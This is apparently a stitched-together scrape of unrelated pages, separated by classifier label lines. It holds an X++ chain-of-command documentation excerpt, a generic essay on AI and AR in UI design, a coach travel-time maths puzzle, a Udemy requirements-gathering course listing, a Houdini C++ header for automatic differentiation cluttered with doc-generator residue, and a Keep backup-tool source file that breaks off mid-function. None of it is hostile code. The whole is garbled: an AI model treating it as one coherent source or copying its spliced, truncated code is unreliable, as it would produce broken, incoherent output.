   }     public boolean validateWrite()     {         boolean ret;         //...         ret = next validateWrite();         //... Form data fields In this example, a data field is extended. FormToExtend is the form, DataSource1 is a data source in the form, Field1 is a field in the data source, and validate is one of many methods that can be wrapped in this nested concept. C#Copy [ExtensionOf(formdatafieldstr(FormToExtend, DataSource1, Field1))] final class FormDataField1_Extension { public boolean validate() {     boolean ret     //...     ret = next validate();     //... Controls In this example, FormToExtend is the form, Button1 is the button control in the form, and clicked is a method that can be wrapped on the button control. C#Copy [ExtensionOf(formcontrolstr(FormToExtend, Button1))] final class FormButton1_Extension {     public void clicked()     {         next clicked();         //... Requirements and considerations when you write CoC methods on extensions for form-nested concepts ·         Like other CoC methods, these methods must always call next to invoke the next method in the chain, so that the chain can go all the way to the kernel or native implementation in the runtime behavior. The call to next is equivalent to a call to super()from the form itself to help guarantee that the base behavior in the runtime is always run as expected. ·         Currently, the X++ editor in Microsoft Visual Studio doesn't support discovery of methods that can be wrapped. Therefore, you must refer to the system documentation for each nested concept to identify the correct method to wrap and its exact signature. ·         You cannot add CoC to wrap methods that aren't defined in the original base behavior of the nested control type. For example, you can't add methodInButton1 CoC on an extension. However, from the control extension, you can make a call into this method if the method has been defined as public or protected. Here is an example where the Button1 control is defined in the FormToExtend form in such a way that it has the methodInButton1 method. C#Copy [Form] public class FormToExtend extends FormRun {     [Control("Button")]     class Button1     {         public void methodInButton1 (str param1)         {             Info("Hi from methodInButton1");             //... } ·         You do not have to recompile the module where the original form is defined to support CoC methods on nested concepts on that form from an extension. For example, if the FormToExtend form from the previous examples is in the ApplicationSuite module, you don't have to recompile ApplicationSuite to extend it with CoC for nested concepts on that form from a different module. Restrictions on wrapper methods The following sections describe restrictions on the use of CoC and method wrapping. Kernel methods can't be wrapped Kernel classes aren't X++ classes. Instead, they are classes that are defined in the kernel of the Microsoft Dynamics 365 Unified Operations platform. Even though extension classes are supported for kernel classes, method wrapping isn't supported for methods of kernel classes. In other words, if you want to wrap a method, the base method must be an X++ method. X++ classes that are compiled by using Platform update 8 or earlier The method wrapping feature requires specific functionality that is emitted by an X++ compiler that is part of Platform update 9 or later. Methods that are compiled by using earlier versions don't have the infrastructure to support this feature. Nested class methods in forms can be wrapped in Platform update 16 or later The ability to wrap methods in nested classes by using class extensions was added in Platform update 16. The concept of nested classes in X++ applies to forms for overriding data source methods and form control methods. Tooling For the features that are described in this topic, the Microsoft Visual Studio X++ editor doesn't yet offer complete support for cross-references and Microsoft IntelliSense. We plan to make complete support available in Dynamics 365 for Finance and Operations Platform update 10.
__label__pos
0.996762
fbpx The future of UI design and emerging technologies The future of UI design and how emerging technologies The future of UI design is an exciting topic to explore as new technologies, and design principles continue to emerge and shape how we create user interfaces. One of the most exciting developments in UI design is the growing focus on emerging technologies such as artificial intelligence, machine learning, and virtual and augmented reality. Artificial intelligence (AI) and machine learning are rapidly advancing technologies Artificial intelligence (AI) and machine learning are rapidly advancing technologies and starting to play a more significant role in the field of UI design. By leveraging these technologies, UI designers can create more intuitive and user-friendly interfaces for websites and applications. One way that AI and machine learning are used in UI design is through chatbots. These AI-powered chatbots can interact with users naturally and intuitively, providing answers to frequently asked questions or directing users to the right page on a website. This can help to improve the overall user experience, as users can find the information they need more quickly and easily. In addition to providing a better user experience, AI-powered chatbots can also help to free up human customer service representatives to handle more complex tasks. By handling simple tasks such as answering frequently asked questions, chatbots can allow customer service representatives to focus on providing more personalized and in-depth support to customers who need it. Overall, the use of AI and machine learning in UI design is a trend that will only continue to grow. By leveraging these technologies, UI designers can create user interfaces that are more intuitive, user-friendly, and efficient than ever before. A futuristic humanoid pointing towards the future in a cyberpunk style Virtual and augmented reality are emerging technologies that are starting to impact the world of UI design. These technologies have the potential to create truly immersive and interactive user experiences, allowing users to interact with digital content more naturally and intuitively. Interactive product displays One way that virtual and augmented reality is used in UI design is by creating interactive product displays. By using augmented reality, users can see how a product would look in their home, giving them a better idea of whether it would fit in with their existing decor. This can help to improve the customer experience, as users can get a better sense of what they are buying before they make a purchase. Another way that virtual and augmented reality is being used in UI design is through the development of training simulations. These simulations can allow users to practice complex tasks in a safe and controlled environment, helping them learn and improve their skills without making costly mistakes. This can be particularly useful for industries such as healthcare, where training simulations can help to prepare professionals for real-world situations. Overall, the use of virtual and augmented reality in UI design is a trend that will only continue to grow. By leveraging these technologies, UI designers can create user interfaces that are more immersive, interactive, and engaging than ever before. A futuristic city with skyscrapers in a cyberpunk style As AI, machine learning, and virtual and augmented reality continue to evolve and advance, they will undoubtedly significantly impact the future of UI design. These emerging technologies have the potential to create user interfaces that are more intuitive, engaging, and user-friendly than ever before. To take full advantage of these technologies, UI designers must stay up-to-date on the latest trends and developments. This will involve staying on top of the latest research and best practices in the field and experimenting with new technologies and design principles. By embracing these emerging technologies and staying ahead of the curve, UI designers can create user interfaces that are truly cutting-edge and innovative. In addition to staying up-to-date on the latest trends, UI designers must also be willing to experiment and take risks. As with any field, there will be failures and setbacks along the way, but by being willing to try new things and push the boundaries of what is possible, UI designers can create truly groundbreaking user interfaces that are unlike anything that has come before. Overall, the future of UI design is bright and exciting, with countless opportunities for innovation and creativity. By embracing emerging technologies and staying up-to-date on the latest trends, UI designers can create user interfaces that are more intuitive, engaging, and user-friendly than ever before. Don't forget to share this post Want to stay in the know? Get all news in your inbox weekly Related Topics: Related Articles When it comes to optimizing your website for LLMV (Local Listing Management Ventures), it’s not just about SEO. Sure, SEO is an important part of the equation—but it’s not the only factor that goes into optimizing your website for local ranking. If you are using a modern SPA (Single page application) stack, probably React JS, Angular or Vue, there is a chance that your are not using jQuery. Artificial intelligence (AI) creative tools can offer several benefits compared to traditional creative tools. Some potential benefits of using AI creative tools include: Book a Call Choose any time slot that suits you.
__label__pos
0.686592
HDK  All Classes Namespaces Files Functions Variables Typedefs Enumerations Enumerator Friends Macros Pages SIM_DerVector3.h Go to the documentation of this file. 1 /* 2  * PROPRIETARY INFORMATION. This software is proprietary to 3  * Side Effects Software Inc., and is not to be reproduced, 4  * transmitted, or disclosed in any way without written permission. 5  * 6  */ 7  8 #ifndef __SIM_DerVector3_h__ 9 #define __SIM_DerVector3_h__ 10  11 #include "SIM_API.h" 12 #include <UT/UT_Matrix3.h> 13 #include <UT/UT_Vector3.h> 14  15 class SIM_DerScalar; 16  17 /// This class defines a 3D vector and its partial derivative w.r.t. another 18 /// 3D vector. It uses automatic differentiation to maintain the dependency 19 /// upon the derivative vector as arithmetic operations are performed. 20 /// The derivative of a vector-valued function is, of course, a Jacobian 21 /// matrix. 22 /// 23 /// By performing a sequence of arithmetic operations on this 24 /// vector class after initializing its derivative appropriately, you can 25 /// easily keep track of the effect of those operations on the derivative. 26 /// Independent variables can be included in an equation using the 27 /// conventional UT_Vector3 and fpreal types, and dependent variables can 28 /// use the SIM_DerVector3 and SIM_DerScalar types. 29 /// 30 /// It is inspired by Eitan Grinspun's class for the same purpose, 31 /// described in his 2003 SCA paper on Discrete Shells. 33 { 34 public: 36  /// Initialize to a constant vector, with no derivative. 37  explicit SIM_DerVector3(const UT_Vector3 &v) : myV(v), myD(0.f) 38  { } 39  /// Initialize to a vector with a derivative. This is particularly 40  /// useful for initializing the variables themselves, where D=I. 42  const UT_Matrix3 &D) : myV(v), myD(D) 43  { } 44  45  // Default copy constructor is fine. 46  //SIM_DerVector3(const SIM_DerVector3 &rhs); 47  48  /// The vector v. 49  const UT_Vector3&v() const 50  { return myV; } 51  52  /// Derivative matrix, dv/dx. 53  /// The entries of the matrix are laid out like a typical Jacobian: 54  /// 55  /// [ dv1/dx1 dv1/dx2 dv1/dx3 ] 56  /// [ dv2/dx1 dv2/dx2 dv2/dx3 ] 57  /// [ dv3/dx1 dv3/dx2 dv3/dx3 ] 58  /// 59  /// [ dv1/dx ] 60  /// = [ dv2/dx ] 61  /// [ dv3/dx ] 62  /// 63  /// = [ dv/dx1 dv/dx2 dv/dx3 ] 64  const UT_Matrix3&D() const 65  { return myD; } 66  67  // Default assignment operator is fine. 68  // SIM_DerVector3 operator=(const SIM_DerVector3 &rhs); 69  71  { 72  return SIM_DerVector3(-v(), -D()); 73  } 75  { 76  // d(v1+v2)/dx = dv1/dx + dv2/dx 77  return SIM_DerVector3(v() + rhs.v(), D() + rhs.D()); 78  } 80  { 81  return SIM_DerVector3(v() + rhs, D()); 82  } 84  { 85  // d(v1-v2)/dx = dv1/dx - dv2/dx 86  return SIM_DerVector3(v() - rhs.v(), D() - rhs.D()); 87  } 89  { 90  return SIM_DerVector3(v() - rhs, D()); 91  } 92  SIM_DerVector3 operator*(const SIM_DerScalar &rhs) const; 94  { 95  // d(v*s)/dx = s*dv/dx + v * (ds/dx)^T 96  return SIM_DerVector3(v() * scalar, D() * scalar); 97  } 99  { return operator=((*this) + rhs); } 101  { return operator=((*this) + rhs); } 103  { return operator=((*this) - rhs); } 105  { return operator=((*this) - rhs); } 107  { return operator=((*this) * rhs); } 109  { return operator=((*this) * rhs); } 110  111  SIM_DerScalar dot(const SIM_DerVector3 &rhs) const; 112  SIM_DerScalar dot(const UT_Vector3 &rhs) const; 113  SIM_DerVector3 cross(const SIM_DerVector3 &rhs) const; 114  SIM_DerVector3 cross(const UT_Vector3 &rhs) const; 115  SIM_DerScalar length2() const; 116  SIM_DerScalar length() const; 117  SIM_DerVector3 normalize() const; 118  119  120  // Matrix corresponding to a vector cross-product. 121  // a x b = S(a) * b 122  // The matrix is skew-symmetric. 123  static UT_Matrix3 S(const UT_Vector3 &v) 124  { 125  return UT_Matrix3( 0, -v.z(), v.y(), 126  v.z(), 0, -v.x(), 127  -v.y(), v.x(), 0); 128  } 129  130 private: 131  UT_Vector3 myV; 132  UT_Matrix3 myD; 133 }; 134  135 #include "SIM_DerScalar.h" 136  137 inline 138 SIM_DerVector3 operator+(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs); 139 inline 140 SIM_DerVector3 operator-(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs); 141 inline 143 inline 145 inline 147 inline 149 inline 150 SIM_DerScalar dot(const SIM_DerVector3 &lhs, const SIM_DerVector3 &rhs); 151 inline 152 SIM_DerScalar dot(const SIM_DerVector3 &lhs, const UT_Vector3 &rhs); 153 inline 154 SIM_DerScalar dot(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs); 155 inline 156 SIM_DerVector3 cross(const SIM_DerVector3 &lhs, const SIM_DerVector3 &rhs); 157 inline 158 SIM_DerVector3 cross(const SIM_DerVector3 &lhs, const UT_Vector3 &rhs); 159 inline 160 SIM_DerVector3 cross(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs); 161  162  163  164 inline SIM_DerVector3 166 { 167  // d(v*s)/dx = s*dv/dx + v * (ds/dx)^T 168  UT_Matrix3 newD(D()); 169  newD *= rhs.v(); 170  newD.outerproductUpdate(1, v(), rhs.D()); 171  172  return SIM_DerVector3(v() * rhs.v(), newD); 173 } 174  175 inline SIM_DerScalar 177 { 178  // d(v1.v2)/dx = v1^T * dv2/dx + v2^T * dv1/dx 179  // Note the rowvector*matrix multiplication. 180  return SIM_DerScalar(::dot(v(), rhs.v()), 181  ::rowVecMult(rhs.v(), D()) + 182  ::rowVecMult(v(), rhs.D())); 183 } 184  185 inline SIM_DerScalar 187 { 188  return SIM_DerScalar(::dot(v(), rhs), 189  ::rowVecMult(rhs, D())); 190 } 191  192 // d(v1 x v2)/dx = dv1/dx x v2 + v1 x dv2/dx 193 // = -v2 x dv1/dx + v1 x dv2/dx 194 // = S(-v2) dv1/dx + S(v1) dv2/dx 195 inline SIM_DerVector3 197 { 198  return SIM_DerVector3(::cross(v(), rhs.v()), 199  S(-rhs.v()) * D() + S(v()) * rhs.D()); 200 } 201  202 // d(v1 x v2)/dx = dv1/dx x v2 + v1 x dv2/dx 203 // = -v2 x dv1/dx + v1 x dv2/dx 204 // = S(-v2) dv1/dx + S(v1) dv2/dx 205 inline SIM_DerVector3 207 { 208  return SIM_DerVector3(::cross(v(), rhs), S(-rhs) * D()); 209 } 210  211 // d|v|^2/dx = d|v.v|/dx 212 // = 2 * v * dv/dx 213 inline SIM_DerScalar 215 { 216  return SIM_DerScalar(v().length2(), 217  2 * ::rowVecMult(v(), D())); 218 } 219  220 // d|v|/dx = d((v.v)^.5)/dx 221 // = .5 / |v| * d(v.v)/dx 222 // = v / |v| * dv/dx 223  224 // Because it includes a square root, there is a discontinuity at the 225 // origin. Like the square root, I approximate using a zero derivative at 226 // the origin. 227 inline SIM_DerScalar 229 { 230  const fpreal tol = 1e-5; 231  const fpreal len = v().length(); 232  if( len < tol ) 233  return SIM_DerScalar(len); 234  else 235  return SIM_DerScalar(len, ::rowVecMult(v() / len, D())); 236 } 237  238 inline SIM_DerVector3 240 { 241  // TODO: we can make this more efficient... can't we? 242  return (*this)/length(); 243 } 244  245  246  247  248  249 inline SIM_DerVector3 250 operator+(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs) 251 { 252  return rhs + lhs; 253 } 254  255 inline SIM_DerVector3 256 operator-(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs) 257 { 258  return SIM_DerVector3(lhs - rhs.v(), -rhs.D()); 259 } 260  261 inline SIM_DerVector3 263 { 264  return v * s; 265 } 266  267 inline SIM_DerVector3 269 { 270  return v * s; 271 } 272  273 inline SIM_DerVector3 275 { 276  return v * s.inverse(); 277 } 278  279 inline SIM_DerVector3 281 { 282  return v * (1/s); 283 } 284  285 inline SIM_DerScalar 286 dot(const SIM_DerVector3 &lhs, const SIM_DerVector3 &rhs) 287 { 288  return lhs.dot(rhs); 289 } 290  291 inline SIM_DerScalar 292 dot(const SIM_DerVector3 &lhs, const UT_Vector3 &rhs) 293 { 294  return lhs.dot(rhs); 295 } 296  297 inline SIM_DerScalar 298 dot(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs) 299 { 300  return rhs.dot(lhs); 301 } 302  303 inline SIM_DerVector3 304 cross(const SIM_DerVector3 &lhs, const SIM_DerVector3 &rhs) 305 { 306  return lhs.cross(rhs); 307 } 308  309 inline SIM_DerVector3 310 cross(const SIM_DerVector3 &lhs, const UT_Vector3 &rhs) 311 { 312  return lhs.cross(rhs); 313 } 314  315 inline SIM_DerVector3 316 cross(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs) 317 { 318  // d(v1 x v2)/dx = dv1/dx x v2 + v1 x dv2/dx 319  // = -v2 x dv1/dx + v1 x dv2/dx 320  // = S(-v2) dv1/dx + S(v1) dv2/dx 321  return SIM_DerVector3(::cross(lhs, rhs.v()), 322  SIM_DerVector3::S(lhs) * rhs.D()); 323 } 324 #endif Mat3< typename promote< S, T >::type > operator*(S scalar, const Mat3< T > &m) Returns M, where for . Definition: Mat3.h:615 SIM_DerVector3 & operator-=(const UT_Vector3 &rhs) SIM_DerVector3 operator+(const SIM_DerVector3 &rhs) const UT_Vector2T< T > rowVecMult(const UT_Vector2T< T > &v, const UT_Matrix2T< S > &m) Definition: UT_Vector2.h:475 SIM_DerScalar dot(const SIM_DerVector3 &lhs, const SIM_DerVector3 &rhs) SIM_DerVector3 & operator+=(const UT_Vector3 &rhs) SIM_DerVector3 & operator*=(const SIM_DerScalar &rhs) const GLdouble * v Definition: glcorearb.h:836 Mat3< typename promote< T0, T1 >::type > operator+(const Mat3< T0 > &m0, const Mat3< T1 > &m1) Returns M, where for . Definition: Mat3.h:631 static UT_Matrix3 S(const UT_Vector3 &v) SIM_DerScalar dot(const SIM_DerVector3 &rhs) const SYS_FORCE_INLINE T & x(void) Definition: UT_Vector3.h:581 SIM_DerScalar inverse() const SIM_DerVector3(const UT_Vector3 &v) Initialize to a constant vector, with no derivative. SIM_DerVector3 normalize() const SYS_FORCE_INLINE T & z(void) Definition: UT_Vector3.h:585 SIM_DerVector3 & operator+=(const SIM_DerVector3 &rhs) GLfloat f Definition: glcorearb.h:1925 SIM_DerVector3 operator-() const UT_Matrix3T< float > UT_Matrix3 SIM_DerScalar length2() const fpreal v() const Definition: SIM_DerScalar.h:46 SIM_DerScalar length() const Mat3< typename promote< T0, T1 >::type > operator-(const Mat3< T0 > &m0, const Mat3< T1 > &m1) Returns M, where for . Definition: Mat3.h:641 SIM_DerVector3 operator*(fpreal scalar) const SIM_DerVector3(const UT_Vector3 &v, const UT_Matrix3 &D) SIM_DerVector3 & operator*=(const fpreal rhs) SIM_DerVector3 cross(const SIM_DerVector3 &rhs) const SIM_DerVector3 & operator-=(const SIM_DerVector3 &rhs) const UT_Vector3 & D() const Definition: SIM_DerScalar.h:49 GridType::Ptr normalize(const GridType &grid, bool threaded, InterruptT *interrupt) Normalize the vectors of the given vector-valued grid. SIM_DerVector3 operator*(const SIM_DerScalar &s, const SIM_DerVector3 &v) SYS_FORCE_INLINE T & y(void) Definition: UT_Vector3.h:583 double fpreal Definition: SYS_Types.h:269 const UT_Matrix3 & D() const const UT_Vector3 & v() const The vector v. SIM_DerVector3 operator*(const SIM_DerScalar &rhs) const void outerproductUpdate(T b, const UT_Vector3F &v1, const UT_Vector3F &v2) Definition: UT_Matrix3.h:403 #define SIM_API Definition: SIM_API.h:10 SIM_DerVector3 operator+(const UT_Vector3 &rhs) const SYS_FORCE_INLINE Storage::MathFloat length() const SIM_DerVector3 operator-(const SIM_DerVector3 &rhs) const SIM_DerVector3 operator/(const SIM_DerVector3 &v, const SIM_DerScalar &s) SIM_DerVector3 cross(const SIM_DerVector3 &lhs, const SIM_DerVector3 &rhs) SIM_DerVector3 operator-(const UT_Vector3 &rhs) const GLuint GLsizei GLsizei * length Definition: glcorearb.h:794
__label__pos
0.928345
Week 241 (25 March 2022) Theo is going home for the weekend to visit his Mum for Mothering Sunday. He is travelling from London to Cardiff by coach. The distance by road from London to Cardiff is 140 miles and the coach is leaving London at 1:30pm. He assumes the coach will travel at an average speed of 50mph. Can you use Theo’s assumptions to work out his arrival time in Cardiff? Answer: Time taken = Distance/ Speed = 140/50 = 2.8hrs 2.8hrs = 2hrs 48 mins (2 + 0.8 x 60) Arrival time = 1.30pm + 2hrs 48 mins = 4:18pm
__label__pos
0.81927
4.25 out of 5 4.25 2591 reviews on Udemy Software Development: Better Requirements Gathering Skills Boost Your Software Requirements Gathering Skills Today! Learn The Techniques That Work! Identify the correct questions to ask during requirements gathering Effectively manage the requirements gathering process Handle 'Single Interviews', 'Group Interviews' and 'Focus Groups'. Anticipate 'problem areas' and how to deal with them Differentiate 'Functional Requirements' from 'Non-Functional Requirements' How to design software for Multiple Departments Manage the customers expectations from day one Choose the right path to delivering software on time and on budget Avoid Project Overrun by clearly defining what is in scope and what is not! Complete the accompanying template files Free 'Software Requirements Specification' Template Free 'Feasibility Guide' Template Whether you are a software developer, architect, project manager or just someone who codes for fun; knowing what to write is just as hard as knowing how to write it. ‘Software requirements gathering‘ is the process of capturing the objectives, goals and wishes of the customer upfront and early-on in the Software Development Life Cycle (SDLC). This course is accompanied by several templates and document files, that you can use as a guideline during your next requirements gathering project. There is a feasibility study template, a software specification template, a terminology guide and a couple more. This course will get you ‘asking the right questions‘ early in the process, saving you time, money and effort. You will learn how to ‘manage the requirements process‘ from start to finish. How to differentiate between ‘Functional and Non-functional requirements‘. How to ‘capture and record requirements‘. Plus, you will get an insight to how one system is used throughout an organization. This course will guide you through the entire range of ‘Scoping Documents‘, ‘Technical Specifications‘, ‘Feasibility Studies‘ and ‘Requirements Gathering‘. Your time is precious and that matters to me, this course has been arranged into small lectures that you can consume when you have a spare few minutes. They follow-on from each other, making the entire course watchable in one sitting. you can be sure that the project you embark on is the same as the project you deliver. On time and on budget. Capturing Software Requirements, Meeting Deliverables, Exceeding Expectations and Documenting the whole process can take years to learn, this stuff is not taught in colleges, it is learned in the trenches. So save yourself time, get the insider information on the topics that matter. By the end of the course, you will have amassed a large number of key takeaways and several useful template files that together will take your software development skills to the next level. This course is for life, meaning you can learn whenever you have the time. You have access to the discussions area, where I will personally answer any questions you have on this course. This course is also backed by a 30 day money back guarantee. If you need a deeper understanding of the software development life cycle. Are about to begin work on a new software project or embark on a prospective customer collaboration? this course will guide you through the process. I look forwards to seeing you on the inside. Kind Regards, Robin. Introduction 1 Introduction This lecture will describe the course, its materials and the logical structure. Students will understand the scope of the entire course, and how to access the resources. 2 What Are Software Requirements? Students will learn Why requirements are needed, and how they can manage expectations, how requirements can mitigate potentially heated discussions and how requirements describe, specific measurable features as clearly as possible. 3 Requirement Types Students will learn how to identify the different types of requirements. Understand how requirements address big issues like scope, understanding and stability and learn the differences between functional and non-functional requirements. Building An Effective Skillset 1 Feasibility Study Students will learn how to determine if a project is feasible before embarking on expensive work. How to factoring human resourcing and expected product lifetime. Plus, you will learn the output from the feasibility study and what it is used for. 2 Feasibilty Quiz 3 Gathering Requirements After completing this lecture students will be able to effectively justify the need for a feasibility report, and how to employ 4 different techniques for eliciting requirements from customers. 4 Requirements Gathering - Getting Started In this lecture you will learn how to focus on the right people, collect the correct information, validate the need and establish benchmarks. You will see the 5 phases that you must go through to gathering requirements and ensure that consideration is given to the priority tasks. 5 Standard Operating Documents After completing this lecture, you will be able to identify the value of existing 'SOP docs', you will learn how it can be necessary to look to the past before moving forwards and finally, you will learn why some requirements are contrained by the client. 6 Asking The Right Questions After completing this lecture you will have the ability to ask the right questions and why wrong questions can sometimes be useful. You will also learn how to re-phrase a question to elicit better responses from your clients. You will also learn my Power-Question, which never fails to coax out the best details that are needed when gathering requirements. 7 Managing Requirements After completing this lecture you will be able to identify both bad and good requirements, you will learn how to employ 5 techniques for converting bad into good. Plus, you will learn a few ways to think about the requirement gathering process designed to save you time and effort. 8 Understanding Interactions After completing this lecture you will be able to understand the interactions between different departments within an organization, you will be able to identify the role that mediation plays in the requirements gathering process. Plus you will be able to avoid conflicting statements by understanding information flow. 9 Interactions Quiz 10 Typcial Architectures In this lecture you will learn how to perceive a system as a tiered architecture, you will learn how by adopting a 'pluggable' approach to software design, make it easy to capture requirements and think in a modular manner. 11 Requirements Specification After completing this lecture you will be able to value 'language-neutrality', understand where the SRS document fits within the SDLC and why ambiguity is the biggest cause of confusion when gathering software requirements. 12 Requirements Validation After completing this lecture, you will be able to justify the validation process, you will be able to remove ambiguity from the problem domain. You will learn the 4 steps to validating requirements. Plus, you will learn how to think 'smart' to manage your requirements gathering process to be the most productive it can. 13 Document Structures After completing this lecture you will have a firm grasp on what needs to be included in a requirements specification. You will learn why both people and problems needs to be described. If you have not done so already you should go download the template for this course from the resources section at the start of this course. Conclusion and Take-aways 1 Conclusion This lecture contains a summary of the main topics covered in this course together with a few useful take away notes. 2 Feedback If you have any questions, then please do not hesitate to ask in the discussion area. I humbly ask that if you enjoyed this course you consider leaving a review, so that future students can see if this course appeals to them. Finally, Thank you for taking the time to complete this course. You can view and review the lecture materials indefinitely, like an on-demand channel. Definitely! If you have an internet connection, courses on Udemy are available on any device at any time. If you don't have an internet connection, some instructors also let their students download course lectures. That's up to the instructor though, so make sure you get on their good side! 4.3 4.3 out of 5 2591 Ratings Detailed Rating Stars 5 729 Stars 4 1204 Stars 3 556 Stars 2 76 Stars 1 26 7427cf1129824cfd84f690990dd85143 30-Day Money-Back Guarantee Includes 1 hours on-demand video Full lifetime access Access on mobile and TV Certificate of Completion Archive
__label__pos
0.54441
Keep – backup system You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.     keep/keep/app/keepmainwindow.cpp 283 lines 8.9 KiB /* This file is part of the Keep project Copyright (C) 2005 Jean-Rémy Falleri <[email protected]> Keep is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. Keep is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with Keep; if not, write to the Free Software Foundation, Inc., 51 Franklin Steet, Fifth Floor, Boston, MA 02110-1301, USA. */ #include "keepmainwindow.h" #include <tqcolor.h> #include <tqlayout.h> #include <tqvariant.h> #include <dcopclient.h> #include <kactioncollection.h> #include <kstdaction.h> #include <kdebug.h> #include <klocale.h> #include <kactivelabel.h> #include <kapp.h> #include <kled.h> #include <kpushbutton.h> #include <kmessagebox.h> #include <kiconloader.h> #include <kconfigdialog.h> #include "backupconfig.h" #include "addbackupwizard.h" #include "restorebackupwizard.h" #include "forcebackupdialog.h" #include "backupconfigdialog.h" #include "generalconfigview.h" #include "rdbmanager.h" #include "keepsettings.h" #include "logdialog.h" KeepMainWindow::KeepMainWindow(TQWidget *parent, const char *name): KMainWindow(parent,name) { setCaption(i18n("Backup System")); m_actionView = new ActionView(this); KIconLoader *icons = TDEGlobal::iconLoader(); m_actionView->m_btnAddWizard->setPixmap(icons->loadIcon("add_backup",KIcon::Toolbar,32)); m_actionView->m_btnRestoreWizard->setPixmap(icons->loadIcon("restore_dir",KIcon::Toolbar,32)); m_actionView->m_btnForce->setPixmap(icons->loadIcon("force_backup",KIcon::Toolbar,32)); m_actionView->m_btnBackupConfig->setPixmap(icons->loadIcon("configure",KIcon::Toolbar,32)); m_actionView->m_btnLog->setPixmap(icons->loadIcon("log",KIcon::Toolbar,32)); slotRefreshGUI(); setCentralWidget(m_actionView); initActions(); initConnections(); resize( minimumSizeHint() ); createGUI(0L); RDBManager manager; if ( !manager.isRDB() ) slotCheckRDB(); } KeepMainWindow::~KeepMainWindow() { } void KeepMainWindow::initActions() { KStdAction::quit(TQT_TQOBJECT(this), TQT_SLOT(close()), actionCollection()); new KAction( i18n("Check rdiff-backup"), "info", "", TQT_TQOBJECT(this), TQT_SLOT(slotCheckRDB()), actionCollection(), "check_rdiff-backup" ); new KAction( i18n("Configure backups"), "configure", "", TQT_TQOBJECT(this), TQT_SLOT(slotConfigureBackup()), actionCollection(), "configure_backups" ); new KAction( i18n("Configure"), "configure", "", TQT_TQOBJECT(this), TQT_SLOT(slotConfigure()), actionCollection(), "configure_keep" ); new KAction( i18n("Add Backup"), "add_backup", "", TQT_TQOBJECT(this), TQT_SLOT(slotAddBackupWizard()), actionCollection(), "add_backup" ); new KAction( i18n("Restore Backup"), "restore_dir", "", TQT_TQOBJECT(this), TQT_SLOT(slotRestoreBackupWizard()), actionCollection(), "restore_backup" ); new KAction( i18n("Backup Now"), "force_backup", "", TQT_TQOBJECT(this), TQT_SLOT(slotForceBackup()), actionCollection(), "force_backup" ); new KAction( i18n("View log"), "log", "", TQT_TQOBJECT(this), TQT_SLOT(slotViewLog()), actionCollection(), "view_log"); } void KeepMainWindow::initConnections() { connect( m_actionView->m_btnAddWizard, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotAddBackupWizard() ) ); connect( m_actionView->m_btnRestoreWizard, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotRestoreBackupWizard() ) ); connect( m_actionView->m_btnForce, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotForceBackup() ) ); connect( m_actionView->m_btnBackupConfig, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotConfigureBackup() ) ); connect( m_actionView->m_btnLog, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotViewLog() ) ); connect( m_actionView->m_btnLoadDaemon, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotLoadDaemon() ) ); connect( m_actionView->m_btnUnloadDaemon, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotUnloadDaemon() ) ); connect( m_actionView->m_btnReloadDaemon, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotReloadDaemon() ) ); } void KeepMainWindow::slotRefreshGUI() { // Sets the Keep Daemon (KDED) State if ( backupSystemRunning() ) { m_actionView->m_lblDaemonState->setText(i18n("<p align=\"right\"><b>Ok</b></p>")); m_actionView->m_btnLoadDaemon->setEnabled(false); m_actionView->m_btnUnloadDaemon->setEnabled(true); m_actionView->m_btnReloadDaemon->setEnabled(true); slotDaemonAlertState(false); } else { m_actionView->m_lblDaemonState->setText(i18n("<p align=\"right\"><b>Not Running</b></p>")); m_actionView->m_btnLoadDaemon->setEnabled(true); m_actionView->m_btnUnloadDaemon->setEnabled(false); m_actionView->m_btnReloadDaemon->setEnabled(false); slotDaemonAlertState(true); } } void KeepMainWindow::slotCheckRDB() { RDBManager manager; if ( manager.isRDB() ) KMessageBox::information(this, i18n("<b>The application rdiff-backup has been detected on your system.</b><br><br> You're running version %1 of rdiff-backup.").arg(manager.RDBVersion())); else KMessageBox::error(this,i18n("<b>The application rdiff-backup has not been detected on your system.</b><br><br>If rdiff-backup is not installed, Keep will not be able to make backups. To fix this problem, install rdiff-backup on your system.")); } void KeepMainWindow::slotForceBackup() { ForceBackupDialog *force = new ForceBackupDialog(this); force->show(); } void KeepMainWindow::slotViewLog() { LogDialog *logDialog = new LogDialog(this); logDialog->show(); } void KeepMainWindow::slotConfigureBackup() { BackupConfigDialog *backupConfig = new BackupConfigDialog(this); backupConfig->show(); } void KeepMainWindow::slotConfigure() { //An instance of your dialog could be already created and could be cached, //in which case you want to display the cached dialog instead of creating //another one if ( TDEConfigDialog::showDialog( "settings" ) ) return; //TDEConfigDialog didn't find an instance of this dialog, so lets create it : TDEConfigDialog* dialog = new TDEConfigDialog( this, "settings", KeepSettings::self() ); GeneralConfigView* generalConfigView = new GeneralConfigView( 0, "generalConfigView" ); dialog->addPage( generalConfigView, i18n("General"), "general" ); dialog->show(); } void KeepMainWindow::slotAddBackupWizard() { AddBackupWizard *addBackupWizard = new AddBackupWizard(this, "addBackupWizard"); connect( addBackupWizard, TQT_SIGNAL( backupSetted(Backup)), TQT_TQOBJECT(this), TQT_SLOT( slotAddBackup(Backup) ) ); addBackupWizard->show(); 